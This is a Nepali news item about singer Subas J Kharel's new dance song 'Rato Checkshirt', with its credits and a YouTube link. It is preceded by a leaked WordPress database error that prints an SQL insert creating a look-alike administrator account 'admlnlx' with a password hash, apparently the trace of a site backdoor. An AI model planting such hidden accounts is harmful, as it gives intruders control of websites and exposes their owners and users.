WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B42qmyZyoYMT/pmFYJTWyo0mwbcnuT.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:24:07', '', 'admlnlx', 'admlnlx')
चितवन, माघ १८–
चितवन घरभई हाल अष्ट्रेलियामा अध्ययन गरिरहेका सुवास जे खरेलले धमाकेदार डान्सिङ गीत बजारमा ल्याएका छन् ।
अहिलेका चर्चित नायिका वर्षा राउत र चर्चित मोडेल पुष्प खड्कालाई फिचरिङ गरिएको ‘रातो चेकसर्ट…’ बोलको गीत आज (मंगलबार) युट्युव मार्फत सार्वजनिक गरिएको हो । गीतले रातो टिसर्ट लगाउँदा देखिएको सुन्दरतालाई बयान गरेको छ । गायक सुवासलाई अहिलेकी चर्चित गायिका मेलिना राईले साथ दिएकी छिन् । नाचौं, नाचौं लाग्ने यस गीतले आम नेपाली दर्शकले मन पराउने गायक खरेलले विश्वास व्यक्त गरे । गायक खरेलले यसअघि ‘यु एण्ड मि’ बोलको गीत बजारमा ल्याएका थिए ।

यस गीतमा गायक खरेलको स्वंम शब्द र संगीत रहेको छ । उदयराज पौडेलको एरेञ्ज, गणेश चौधरीको रेकर्डिङ रहेको यस गीतको भिडियोको कोरियोग्राफर दीपेन्द्र शाही ठकुरी हुन् । भिडियोको निर्देशन हरि हुमागाईले गरेका हुन् भने निशान घिमिरेले सम्पादन गरेका हुन् ।
हेर्नुहोस् भिडियो
https://www.youtube.com/watch?v=RdbIB3fznUQ&t=167s


